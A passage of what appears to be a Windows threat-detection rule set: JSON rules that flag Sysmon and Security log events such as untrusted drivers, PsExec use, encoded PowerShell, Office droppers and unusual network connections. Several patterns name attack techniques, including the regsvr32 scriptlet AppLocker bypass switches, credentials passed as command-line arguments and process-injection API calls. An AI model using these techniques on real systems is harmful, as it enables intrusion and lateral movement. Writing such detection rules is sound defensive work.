32 | "Microsoft-Windows-Sysmon/Operational": [ 33 | 6 34 | ] 35 | }, 36 | "Computers": [], 37 | "Criticality": 3, 38 | "Author": "@0xrawsec", 39 | "Comments": "It may happen that drivers do not have valid signatures", 40 | "Schema": "2.0.0" 41 | }, 42 | "Matches": [ 43 | "$valid: SignatureStatus = 'Valid'" 44 | ], 45 | "Condition": "!$valid" 46 | } 47 | 48 | { 49 | "Name": "DriverLoadedSuspiciousSigStatus", 50 | "Tags": [ 51 | "DriverLoaded", 52 | "Signature" 53 | ], 54 | "Meta": { 55 | "Events": { 56 | "Microsoft-Windows-Sysmon/Operational": [ 57 | 6 58 | ] 59 | }, 60 | "Computers": [], 61 | "Criticality": 7, 62 | "Author": "@0xrawsec", 63 | "Comments": "Experimental: flags a signature status that is neither Valid nor Unavailable", 64 | "Schema": "2.0.0" 65 | }, 66 | "Matches": [ 67 | "$valid: SignatureStatus = 'Valid'", 68 | "$unavailable: SignatureStatus = 'Unavailable'" 69 | ], 70 | "Condition": "!$valid and !$unavailable" 71 | } 72 | 73 | { 74 | "Name": "UntrustedDriverLoaded", 75 | 
"Tags": [ 76 | "DriverLoaded", 77 | "Sysmon" 78 | ], 79 | "Meta": { 80 | "Events": { 81 | "Microsoft-Windows-Sysmon/Operational": [ 82 | 6 83 | ] 84 | }, 85 | "Computers": [], 86 | "Criticality": 10, 87 | "ATTACK": [ 88 | { 89 | "ID": "T1014", 90 | "Tactic": "Defense Evasion", 91 | "Reference": "https://attack.mitre.org/techniques/T1014/" 92 | } 93 | ], 94 | "Author": "@0xrawsec", 95 | "Comment": "Untrusted driver loaded. The trusted-drv-sig template needs to be adjusted to the environment.", 96 | "Schema": "2.0.0" 97 | }, 98 | "Matches": [ 99 | "$trusted: Signature ~= '{{trusted-drv-sig}}'" 100 | ], 101 | "Condition": "!$trusted" 102 | } 103 | 104 | -------------------------------------------------------------------------------- /rules/filters/sysmon.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "ProcessCreate", 3 | "Meta": { 4 | "Events": { 5 | "Microsoft-Windows-Sysmon/Operational": [ 6 | 1 7 | ] 8 | }, 9 | "Filter": true, 10 | "Comments": "Filter in any Sysmon ProcessCreate event", 11 | "Schema": "2.0.0" 12 | }, 13 | "Matches": [], 14 | "Condition": "" 15 | } 16 | 17 | { 18 | "Name": "NetworkConnect", 19 | "Meta": { 20 | "Events": { 21 | "Microsoft-Windows-Sysmon/Operational": [ 22 | 3 23 | ] 24 | }, 25 | "Filter": true, 26 | "Disable": true, 27 | "Comments": "Filter in any Sysmon NetworkConnect event (disabled by default)", 28 | "Schema": "2.0.0" 29 | }, 30 | "Matches": [], 31 | "Condition": "" 32 | } 33 | 34 | -------------------------------------------------------------------------------- /rules/informative.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "InfoSuspiciousParent", 3 | "Tags": [ 4 | "Info" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 0, 14 | "Author": "0xrawsec", 15 | "Comments": "Informative rule to tag processes whose parent image is in the suspicious template", 16 | "Schema": "2.0.0" 17 | }, 18 | 
"Matches": [ 19 | "$susp: ParentImage ~= '{{suspicious}}$'" 20 | ], 21 | "Condition": "$susp" 22 | } 23 | 24 | { 25 | "Name": "InfoRemotePath", 26 | "Tags": [ 27 | "Info", 28 | "Lateral" 29 | ], 30 | "Meta": { 31 | "Events": { 32 | "Microsoft-Windows-Sysmon/Operational": [ 33 | 1 34 | ] 35 | }, 36 | "Computers": [], 37 | "Criticality": 0, 38 | "Author": "0xrawsec", 39 | "Comment": "Heuristic to catch remote path in command line", 40 | "Schema": "2.0.0" 41 | }, 42 | "Matches": [ 43 | "$rpath: CommandLine ~= '(?i:\\\\\\\\[\\w\\.]+)'" 44 | ], 45 | "Condition": "$rpath" 46 | } 47 | 48 | -------------------------------------------------------------------------------- /rules/laterals.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "LogonFromExternal", 3 | "Tags": [ 4 | "Lateral", 5 | "Security" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Security": [ 10 | 4624 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 10, 15 | "Author": "@0xrawsec", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$iplh1: IpAddress = '-'", 20 | "$iplh2: IpAddress = '127.0.0.1'", 21 | "$iplh3: IpAddress = '::1'", 22 | "$privip: IpAddress ~= '{{priv-ipv4}}'" 23 | ], 24 | "Condition": "!($privip or $iplh1 or $iplh2 or $iplh3)" 25 | } 26 | 27 | { 28 | "Name": "AnonymousNetworkLogon", 29 | "Tags": [ 30 | "Lateral", 31 | "Security" 32 | ], 33 | "Meta": { 34 | "Events": { 35 | "Security": [ 36 | 4624 37 | ] 38 | }, 39 | "Computers": [], 40 | "Criticality": 5, 41 | "Author": "@0xrawsec", 42 | "Schema": "2.0.0" 43 | }, 44 | "Matches": [ 45 | "$logt: LogonType = '3'", 46 | "$kerb: AuthenticationPackageName = 'Kerberos'", 47 | "$user: TargetUserName = 'ANONYMOUS LOGON'", 48 | "$iplh1: IpAddress = '-'", 49 | "$iplh2: IpAddress = '127.0.0.1'" 50 | ], 51 | "Condition": "$logt and !$kerb and $user and !$iplh1 and !$iplh2" 52 | } 53 | 54 | { 55 | "Name": "ExplicitNetworkLogon", 56 | "Tags": [ 57 | "Lateral", 58 | "Security" 59 | ], 60 | "Meta": { 
61 | "Events": { 62 | "Security": [ 63 | 4624 64 | ] 65 | }, 66 | "Computers": [], 67 | "Criticality": 5, 68 | "Author": "@0xrawsec", 69 | "Schema": "2.0.0" 70 | }, 71 | "Matches": [ 72 | "$logt: LogonType = '3'", 73 | "$user: TargetUserName = 'ANONYMOUS LOGON'", 74 | "$iplh1: IpAddress = '-'", 75 | "$iplh2: IpAddress = '127.0.0.1'", 76 | "$enddol: TargetUserName ~= '\\$$'" 77 | ], 78 | "Condition": "$logt and !($user or $iplh1 or $iplh2 or $enddol)" 79 | } 80 | 81 | { 82 | "Name": "PsExec4624", 83 | "Tags": [ 84 | "Lateral", 85 | "Security" 86 | ], 87 | "Meta": { 88 | "Events": { 89 | "Security": [ 90 | 4624 91 | ] 92 | }, 93 | "Computers": [], 94 | "Criticality": 5, 95 | "Author": "@0xrawsec", 96 | "Schema": "2.0.0" 97 | }, 98 | "Matches": [ 99 | "$psexec: ProcessName ~= '(?i:\\\\PSEXESVC\\.exe$)'" 100 | ], 101 | "Condition": "$psexec" 102 | } 103 | 104 | { 105 | "Name": "AlternateExplicitCredentialUse", 106 | "Tags": [ 107 | "Lateral", 108 | "Security" 109 | ], 110 | "Meta": { 111 | "Events": { 112 | "Security": [ 113 | 4648 114 | ] 115 | }, 116 | "Computers": [], 117 | "Criticality": 4, 118 | "Author": "@0xrawsec", 119 | "Comment": "Experimental: 4648 explicit-credential logon (alternate credentials, runas-style) whose source IpAddress is not local ('-', 127.0.0.1 or ::1), whose calling process is not winlogon.exe and whose TargetServerName is not localhost", 120 | "Schema": "2.0.0" 121 | }, 122 | "Matches": [ 123 | "$iplh1: IpAddress = '-'", 124 | "$iplh2: IpAddress = '127.0.0.1'", 125 | "$iplh3: IpAddress = '::1'", 126 | "$wlpn: ProcessName ~= 'C:\\\\Windows\\\\System32\\\\winlogon\\.exe'", 127 | "$wltsn: TargetServerName = 'localhost'" 128 | ], 129 | "Condition": "!$iplh1 and !$iplh2 and !$iplh3 and !$wlpn and !$wltsn" 130 | } 131 | 132 | { 133 | "Name": "HeurCLWithCreds", 134 | "Tags": [ 135 | "Heuristics", 136 | "Lateral" 137 | ], 138 | "Meta": { 139 | "Events": { 140 | "Microsoft-Windows-Sysmon/Operational": [ 141 | 1 142 | ] 143 | }, 144 | "Computers": [], 145 | "Criticality": 5, 146 | "Author": "0xrawsec", 147 | "Comments": "Experimental rule to catch command lines passing credentials as arguments: the space-delimited /U user, /S host and /P password switches must all be present (as used for example by schtasks.exe against a remote host).", 148 | "Schema": "2.0.0" 149 | }, 150 | "Matches": [ 151 | "$ruser: 
CommandLine ~= '(?i: /U )'", 152 | "$rhost: CommandLine ~= '(?i: /S )'", 153 | "$rpwd: CommandLine ~= '(?i: /P )'" 154 | ], 155 | "Condition": "$ruser and $rhost and $rpwd" 156 | } 157 | 158 | { 159 | "Name": "PrivUserLogon", 160 | "Tags": [ 161 | "Heuristics", 162 | "Lateral" 163 | ], 164 | "Meta": { 165 | "Events": { 166 | "Security": [ 167 | 4672 168 | ] 169 | }, 170 | "Computers": [], 171 | "Criticality": 5, 172 | "Author": "0xrawsec", 173 | "Comments": "", 174 | "Disable": true, 175 | "Schema": "2.0.0" 176 | }, 177 | "Matches": [], 178 | "Condition": "" 179 | } 180 | 181 | -------------------------------------------------------------------------------- /rules/network.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "PublicIPNetConn", 3 | "Tags": [ 4 | "Network" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 3 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 1, 14 | "Comments": "Outbound connection to a public IP (not private range, not multicast, not IPv6 localhost), excluding browsers installed under Program Files or the system directory. Disabled by default.", 15 | "Author": "0xrawsec", 16 | "Disable": true, 17 | "Schema": "2.0.0" 18 | }, 19 | "Matches": [ 20 | "$privdir: Image ~= '^({{programfiles}}|{{system}})'", 21 | "$browser: Image ~= '{{browsers}}$'", 22 | "$dstmulticast: DestinationIp ~= '(?i:^(224|23(2|3|4)|239\\.))'", 23 | "$dstlocalhostv6: DestinationIp = '0:0:0:0:0:0:0:1'", 24 | "$dstprivip: DestinationIp ~= '{{priv-ipv4}}'", 25 | "$init: Initiated = 'true'" 26 | ], 27 | "Condition": "!($dstmulticast or $dstprivip or ($browser and $privdir) or $dstlocalhostv6) and $init" 28 | } 29 | 30 | { 31 | "Name": "NoBrowserHTTP", 32 | "Tags": [ 33 | "Network" 34 | ], 35 | "Meta": { 36 | "Events": { 37 | "Microsoft-Windows-Sysmon/Operational": [ 38 | 3 39 | ] 40 | }, 41 | "Computers": [], 42 | "Criticality": 5, 43 | "Comments": "Outbound connections to the standard HTTP/HTTPS ports (80/443) from software other than browsers. Note: $dstprivip is defined but not used in the condition, so connections to private IPs are not excluded.", 44 | "Author": "0xrawsec", 45 | "Disable": true, 46 | "Schema": "2.0.0" 47 | }, 48 | "Matches": [ 49 | "$browser: Image ~= 
'{{browsers}}$'", 50 | "$dstprivip: DestinationIp ~= '{{priv-ipv4}}'", 51 | "$init: Initiated = 'true'", 52 | "$http: DestinationPort = '80'", 53 | "$https: DestinationPort = '443'" 54 | ], 55 | "Condition": "$init and ($http or $https) and !$browser" 56 | } 57 | 58 | { 59 | "Name": "UnkPrivDstPort", 60 | "Tags": [ 61 | "Network" 62 | ], 63 | "Meta": { 64 | "Events": { 65 | "Microsoft-Windows-Sysmon/Operational": [ 66 | 3 67 | ] 68 | }, 69 | "Computers": [], 70 | "Criticality": 6, 71 | "Comments": "Connection initiated by a non-system image to a private IP address (localhost excluded) on a port Sysmon has no name for (empty DestinationPortName), i.e. an unknown protocol inside the internal network", 72 | "Author": "0xrawsec", 73 | "Schema": "2.0.0" 74 | }, 75 | "Matches": [ 76 | "$dstlocalhostv6: DestinationIp = '0:0:0:0:0:0:0:1'", 77 | "$dstlocalhost: DestinationIp = '127.0.0.1'", 78 | "$dstprivip: DestinationIp ~= '{{priv-ipv4}}'", 79 | "$unk: DestinationPortName ~= '^$'", 80 | "$system: Image ~= '^{{system}}'", 81 | "$init: Initiated = 'true'" 82 | ], 83 | "Condition": "!$system and $dstprivip and !($dstlocalhost or $dstlocalhostv6) and $unk and $init" 84 | } 85 | 86 | { 87 | "Name": "UnkDstPort", 88 | "Tags": [ 89 | "Network" 90 | ], 91 | "Meta": { 92 | "Events": { 93 | "Microsoft-Windows-Sysmon/Operational": [ 94 | 3 95 | ] 96 | }, 97 | "Computers": [], 98 | "Criticality": 8, 99 | "Comments": "Connection initiated by a non-system image to a public (non-private, non-localhost) IP address on a port Sysmon has no name for (empty DestinationPortName), i.e. an unknown protocol leaving the network", 100 | "Author": "0xrawsec", 101 | "Schema": "2.0.0" 102 | }, 103 | "Matches": [ 104 | "$dstlocalhost: DestinationIp = '127.0.0.1'", 105 | "$dstprivip: DestinationIp ~= '{{priv-ipv4}}'", 106 | "$unk: DestinationPortName ~= '^$'", 107 | "$system: Image ~= '^{{system}}'", 108 | "$init: Initiated = 'true'" 109 | ], 110 | "Condition": "!$system and !$dstprivip and !$dstlocalhost and $unk and $init" 111 | } 112 | 113 | -------------------------------------------------------------------------------- /rules/office.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "MSOfficeThreat", 3 | "Tags": [ 4 | "Office", 5 | 
"Threat" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Microsoft-Windows-Sysmon/Operational": [ 10 | 1 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 8, 15 | "ATTACK": [ 16 | { 17 | "ID": "T1193", 18 | "Tactic": "initial-access", 19 | "Reference": "https://attack.mitre.org/techniques/T1193" 20 | } 21 | ], 22 | "Author": "0xrawsec", 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$pimsoffice: ParentImage ~= '{{msoffice}}$'", 27 | "$susp: Image ~= '{{suspicious}}$'", 28 | "$fp1: CommandLine ~= '(?i:shell32\\.dll,(OpenAs_RunDLL|SHCreateLocalServerRunDll|Control_RunDLL))'" 29 | ], 30 | "Condition": "$pimsoffice and !$fp1 and $susp" 31 | } 32 | 33 | { 34 | "Name": "OfficeDropper", 35 | "Tags": [ 36 | "Office", 37 | "Dropper" 38 | ], 39 | "Meta": { 40 | "Events": { 41 | "Microsoft-Windows-Sysmon/Operational": [ 42 | 11 43 | ] 44 | }, 45 | "Computers": [], 46 | "Criticality": 8, 47 | "ATTACK": [ 48 | { 49 | "ID": "T1193", 50 | "Tactic": "initial-access", 51 | "Reference": "https://attack.mitre.org/techniques/T1193" 52 | } 53 | ], 54 | "Author": "0xrawsec", 55 | "Comments": "Experimental rule to detect executable created by MSOffice tools.", 56 | "Schema": "2.0.0" 57 | }, 58 | "Matches": [ 59 | "$office: Image ~= '{{msoffice}}$'", 60 | "$target: TargetFilename ~= '({{exec-exts}}|{{script-exts}})$'" 61 | ], 62 | "Condition": "$office and $target" 63 | } 64 | 65 | { 66 | "Name": "OfficeDropperExec", 67 | "Tags": [ 68 | "Office", 69 | "Dropper" 70 | ], 71 | "Meta": { 72 | "Events": { 73 | "Microsoft-Windows-Sysmon/Operational": [ 74 | 1 75 | ] 76 | }, 77 | "Computers": [], 78 | "Criticality": 8, 79 | "ATTACK": [ 80 | { 81 | "ID": "T1193", 82 | "Tactic": "initial-access", 83 | "Reference": "https://attack.mitre.org/techniques/T1193" 84 | } 85 | ], 86 | "Author": "0xrawsec", 87 | "Comment": "Experimental rule to catch MS Office based droppers", 88 | "Schema": "2.0.0" 89 | }, 90 | "Matches": [ 91 | "$pimsoffice: ParentImage ~= '{{msoffice}}$'", 92 | "$whitelisted: 
Image ~= '^({{windows}}|{{programfiles}}|{{appv}})'" 93 | ], 94 | "Condition": "$pimsoffice and !$whitelisted" 95 | } 96 | 97 | { 98 | "Name": "OfficeNetConn", 99 | "Tags": [ 100 | "Office", 101 | "Network" 102 | ], 103 | "Meta": { 104 | "Events": { 105 | "Microsoft-Windows-Sysmon/Operational": [ 106 | 3 107 | ] 108 | }, 109 | "Computers": [], 110 | "Criticality": 3, 111 | "Author": "0xrawsec", 112 | "Disable": true, 113 | "Schema": "2.0.0" 114 | }, 115 | "Matches": [ 116 | "$pimsoffice: ParentImage ~= '{{msoffice}}$'", 117 | "$net: Initiated ~= 'true'" 118 | ], 119 | "Condition": "$pimsoffice and $net" 120 | } 121 | 122 | { 123 | "Name": "FromDownloadedDocument", 124 | "Tags": [ 125 | "Office", 126 | "Download" 127 | ], 128 | "Meta": { 129 | "Events": { 130 | "Microsoft-Windows-Sysmon/Operational": [ 131 | 1 132 | ] 133 | }, 134 | "Computers": [], 135 | "Criticality": 0, 136 | "Author": "0xrawsec", 137 | "Comment": "This rule is used as a simple informative tag", 138 | "Schema": "2.0.0" 139 | }, 140 | "Matches": [ 141 | "$pimsoffice: ParentImage ~= '{{msoffice}}$'", 142 | "$pcl: ParentCommandLine ~= '(?i:appdata\\\\local\\\\microsoft\\\\windows\\\\temporary internet files\\\\)'" 143 | ], 144 | "Condition": "$pimsoffice and $pcl" 145 | } 146 | 147 | -------------------------------------------------------------------------------- /rules/powershell.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "PowershellExecEnc", 3 | "Tags": [ 4 | "Powershell", 5 | "Heuristics" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Microsoft-Windows-Sysmon/Operational": [ 10 | 1 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 5, 15 | "ATTACK": [ 16 | { 17 | "ID": "T1202", 18 | "Tactic": "Defense Evasion", 19 | "Reference": "https://attack.mitre.org/techniques/T1202/" 20 | } 21 | ], 22 | "Author": "0xrawsec", 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$i: Image ~= '(?i:\\\\powershell.exe$)'", 27 | "$enc: CommandLine ~= 
'(?i: (-|/)e[ncodedcommands]* )'" 28 | ], 29 | "Condition": "$i and $enc" 30 | } 31 | 32 | { 33 | "Name": "PowershellNetConn", 34 | "Tags": [ 35 | "Powershell", 36 | "Network" 37 | ], 38 | "Meta": { 39 | "Events": { 40 | "Microsoft-Windows-Sysmon/Operational": [ 41 | 3 42 | ] 43 | }, 44 | "Computers": [], 45 | "Criticality": 5, 46 | "Author": "0xrawsec", 47 | "Disable": true, 48 | "Schema": "2.0.0" 49 | }, 50 | "Matches": [ 51 | "$ps: Image ~= '(?i:\\\\powershell.exe$)'", 52 | "$net: Initiated ~= 'true'" 53 | ], 54 | "Condition": "$ps and $net" 55 | } 56 | 57 | { 58 | "Name": "PowershellLargeCL", 59 | "Tags": [ 60 | "Heuristics", 61 | "CL" 62 | ], 63 | "Meta": { 64 | "Events": { 65 | "Microsoft-Windows-Sysmon/Operational": [ 66 | 1 67 | ] 68 | }, 69 | "Computers": [], 70 | "Criticality": 4, 71 | "Author": "@0xrawsec", 72 | "Comment": "Match powershell.exe command lines of 512 characters or more (pwsh.exe is not covered by the Image match)", 73 | "Schema": "2.0.0" 74 | }, 75 | "Matches": [ 76 | "$lcl: CommandLine ~= '.{512,}'", 77 | "$ps: Image ~= '(?i:\\\\powershell.exe$)'" 78 | ], 79 | "Condition": "$lcl and $ps" 80 | } 81 | 82 | { 83 | "Name": "PowershellEmbeddedC#", 84 | "Tags": [ 85 | "Powershell", 86 | "EmbeddedCode" 87 | ], 88 | "Meta": { 89 | "Events": { 90 | "Microsoft-Windows-Sysmon/Operational": [ 91 | 1 92 | ] 93 | }, 94 | "Computers": [], 95 | "Criticality": 3, 96 | "Author": "@0xrawsec", 97 | "Comment": "PowerShell spawning csc.exe, i.e. compiling C# embedded in a script at run time (typically Add-Type)", 98 | "Schema": "2.0.0" 99 | }, 100 | "Matches": [ 101 | "$ps: ParentImage ~= '(?i:\\\\powershell.exe$)'", 102 | "$csc: Image ~= '(?i:\\\\csc.exe$)'" 103 | ], 104 | "Condition": "$csc and $ps" 105 | } 106 | 107 | { 108 | "Name": "PowershellStdin", 109 | "Tags": [ 110 | "Powershell" 111 | ], 112 | "Meta": { 113 | "Events": { 114 | "Microsoft-Windows-Sysmon/Operational": [ 115 | 1 116 | ] 117 | }, 118 | "Computers": [], 119 | "Criticality": 5, 120 | "ATTACK": [ 121 | { 122 | "ID": "T1202", 123 | "Tactic": "Defense Evasion", 124 | "Reference": 
"https://attack.mitre.org/techniques/T1202/" 125 | } 126 | ], 127 | "Author": "@0xrawsec", 128 | "Comment": "powershell.exe started with -Command - (or -c -), i.e. the script is read from stdin and never appears in the command line", 129 | "Schema": "2.0.0" 130 | }, 131 | "Matches": [ 132 | "$ps: Image ~= '(?i:\\\\powershell.exe$)'", 133 | "$arg: CommandLine ~= '(?i: (-|/)c[ommand]*\\s+-)'" 134 | ], 135 | "Condition": "$ps and $arg" 136 | } 137 | 138 | { 139 | "Name": "PSC#Win32API", 140 | "Tags": [ 141 | "Powershell", 142 | "C#", 143 | "ScriptBlock" 144 | ], 145 | "Meta": { 146 | "Events": { 147 | "Microsoft-Windows-PowerShell/Operational": [] 148 | }, 149 | "Computers": [], 150 | "Criticality": 7, 151 | "Author": "@0xrawsec", 152 | "Comment": "Script block text referencing process/thread/memory manipulation Win32 APIs (OpenProcess, WriteProcessMemory, VirtualAlloc, SetThreadContext, ...) as used by C# P/Invoke injection code. Matches on API names only, so legitimate modules that P/Invoke these functions may also fire", 153 | "Schema": "2.0.0" 154 | }, 155 | "Matches": [ 156 | "$api: ScriptBlockText ~= '(?i:(OpenProcess|OpenThread|SetThreadContext|OpenThreadToken|GetProcAddress|OpenThreadToken|OpenProcessToken|CreateProcess|WriteProcessMemory|ReadProcessMemory|VirtualAlloc))'" 157 | ], 158 | "Condition": "$api" 159 | } 160 | 161 | { 162 | "Name": "PSInvokeExpression", 163 | "Tags": [ 164 | "Powershell" 165 | ], 166 | "Meta": { 167 | "Events": { 168 | "Microsoft-Windows-PowerShell/Operational": [ 169 | 4103 170 | ] 171 | }, 172 | "Computers": [], 173 | "Criticality": 6, 174 | "Author": "0xrawsec", 175 | "Comment": "Powershell making use of Invoke-Expression cmdlet. 
May require filtering depending on environment", 176 | "ATTACK": [ 177 | { 178 | "ID": "T1202", 179 | "Tactic": "Defense Evasion", 180 | "Reference": "https://attack.mitre.org/techniques/T1202/" 181 | } 182 | ], 183 | "Schema": "2.0.0" 184 | }, 185 | "Matches": [ 186 | "$ci: Payload ~= 'CommandInvocation\\(Invoke-Expression\\)'" 187 | ], 188 | "Condition": "$ci" 189 | } 190 | 191 | -------------------------------------------------------------------------------- /rules/privesc.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "HeuristicPrivEsc", 3 | "Tags": [ 4 | "PrivEsc", 5 | "Heuristics" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Microsoft-Windows-Sysmon/Operational": [ 10 | 10 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 8, 15 | "MinSysmonVersion": "v13.34", 16 | "Author": "0xrawsec", 17 | "Schema": "2.0.0" 18 | }, 19 | "Matches": [ 20 | "$src_image_wl: SourceImage ~= '(?i:{{system}}(taskmgr)\\.exe)'", 21 | "$sync_access: GrantedAccess = '0x100000'", 22 | "$src_user: SourceUser ~= '(?i:NT AUTHORITY\\\\)'", 23 | "$tgt_user: TargetUser ~= '(?i:NT AUTHORITY\\\\)'" 24 | ], 25 | "Condition": "!$sync_access and (!$src_user and $tgt_user) and !$src_image_wl" 26 | } 27 | 28 | { 29 | "Name": "HeuristicSuspiciousAccess", 30 | "Tags": [ 31 | "Heuristics" 32 | ], 33 | "Meta": { 34 | "Events": { 35 | "Microsoft-Windows-Sysmon/Operational": [ 36 | 10 37 | ] 38 | }, 39 | "Computers": [], 40 | "Criticality": 8, 41 | "MinSysmonVersion": "v13.34", 42 | "Author": "0xrawsec", 43 | "Schema": "2.0.0" 44 | }, 45 | "Matches": [ 46 | "$unk_calltrace: CallTrace ~= 'UNKNOWN'", 47 | "$sync_access: GrantedAccess = '0x100000'", 48 | "$src_user: SourceUser ~= '(?i:NT AUTHORITY\\\\)'", 49 | "$tgt_user: TargetUser ~= '(?i:NT AUTHORITY\\\\)'" 50 | ], 51 | "Condition": "!$sync_access and (!$src_user and $tgt_user) and $unk_calltrace" 52 | } -------------------------------------------------------------------------------- 
/rules/psexec.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "PsExec", 3 | "Tags": [ 4 | "Powershell", 5 | "Heuristics" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Microsoft-Windows-Sysmon/Operational": [ 10 | 1 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 7, 15 | "Author": "0xrawsec", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$psexec: Product = 'Sysinternals PsExec'", 20 | "$im: Image ~= '(?i:\\\\psexe(c|svc).exe$)'" 21 | ], 22 | "Condition": "$psexec and $im" 23 | } 24 | 25 | { 26 | "Name": "HiddenPsExec", 27 | "Tags": [ 28 | "Powershell", 29 | "Heuristics" 30 | ], 31 | "Meta": { 32 | "Events": { 33 | "Microsoft-Windows-Sysmon/Operational": [ 34 | 1 35 | ] 36 | }, 37 | "Computers": [], 38 | "Criticality": 9, 39 | "Author": "0xrawsec", 40 | "Schema": "2.0.0" 41 | }, 42 | "Matches": [ 43 | "$psexec: Product = 'Sysinternals PsExec'", 44 | "$im: Image ~= '(?i:\\\\psexe(c|svc).exe$)'" 45 | ], 46 | "Condition": "$psexec and !$im" 47 | } 48 | 49 | { 50 | "Name": "PsExecCommand", 51 | "Tags": [ 52 | "Powershell", 53 | "Heuristics" 54 | ], 55 | "Meta": { 56 | "Events": { 57 | "Microsoft-Windows-Sysmon/Operational": [ 58 | 1 59 | ] 60 | }, 61 | "Computers": [], 62 | "Criticality": 10, 63 | "Author": "0xrawsec", 64 | "Schema": "2.0.0" 65 | }, 66 | "Matches": [ 67 | "$psexesvc: ParentImage ~= '(?i:\\\\psexesvc.exe$)'" 68 | ], 69 | "Condition": "$psexesvc" 70 | } 71 | 72 | -------------------------------------------------------------------------------- /rules/regsvr32.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Regsvr32ApplockerBypass", 3 | "Tags": [ 4 | "Regsvr32", 5 | "AppLockerBypass", 6 | "Sysmon" 7 | ], 8 | "Meta": { 9 | "Events": { 10 | "Microsoft-Windows-Sysmon/Operational": [ 11 | 1 12 | ] 13 | }, 14 | "Computers": [], 15 | "Criticality": 10, 16 | "ATTACK": [ 17 | { 18 | "ID": "T1117", 19 | "Tactic": "execution", 20 | 
"Reference": "https://attack.mitre.org/techniques/T1117" 21 | } 22 | ], 23 | "Author": "@0xrawsec", 24 | "Comment": "Rule that triggers on the regsvr32.exe /n /s /u /i:scriptlet-URL AppLocker bypass (see Metasploit regsvr32_applocker_bypass_server module). Only slash-prefixed, space-delimited switches are matched and all four must be present; variants omitting /n or /u are not caught.", 25 | "Schema": "2.0.0" 26 | }, 27 | "Matches": [ 28 | "$im: Image ~= '(?i:^c:\\\\windows\\\\sys(wow64|tem32)\\\\regsvr32.exe$)'", 29 | "$sw1: CommandLine ~= '(?i: /n )'", 30 | "$sw2: CommandLine ~= '(?i: /s )'", 31 | "$sw3: CommandLine ~= '(?i: /u )'", 32 | "$sw4: CommandLine ~= '(?i: /i:)'" 33 | ], 34 | "Condition": "$im and $sw4 and $sw3 and $sw2 and $sw1" 35 | } 36 | 37 | -------------------------------------------------------------------------------- /rules/remotethread.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "RemoteThread", 3 | "Tags": [ 4 | "RemoteThread", 5 | "Sysmon" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Microsoft-Windows-Sysmon/Operational": [ 10 | 8 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 5, 15 | "Author": "@0xrawsec", 16 | "Comment": "This rule catches any unusual CreateRemoteThread events. 
This rule has been disabled because it did not prove its usefulness", 17 | "Disable": true, 18 | "Schema": "2.0.0" 19 | }, 20 | "Matches": [ 21 | "$svchost: SourceImage ~= '(?i:^C:\\\\Windows\\\\System32\\\\svchost\\.exe$)'", 22 | "$conhost: TargetImage ~= '(?i:^C:\\\\Windows\\\\System32\\\\conhost\\.exe$)'", 23 | "$wlp1: SourceImage ~= '(?i:^C:\\\\Windows\\\\System32\\\\csrss\\.exe$)'", 24 | "$wlp2: SourceImage ~= '(?i:^C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE\\.exe$)'" 25 | ], 26 | "Condition": "!$wlp1 and !$wlp2 and !($svchost and $conhost)" 27 | } 28 | 29 | -------------------------------------------------------------------------------- /rules/rundll32.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SuspiciousRundll32", 3 | "Tags": [ 4 | "Rundll32" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 7 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 6, 14 | "ATTACK": [ 15 | { 16 | "ID": "T1085", 17 | "Tactic": "execution", 18 | "Reference": "https://attack.mitre.org/techniques/T1085" 19 | } 20 | ], 21 | "Author": "0xrawsec", 22 | "Comments": "Experimental rule to try to spot suspicious DLLs loaded using rundll32.exe. 
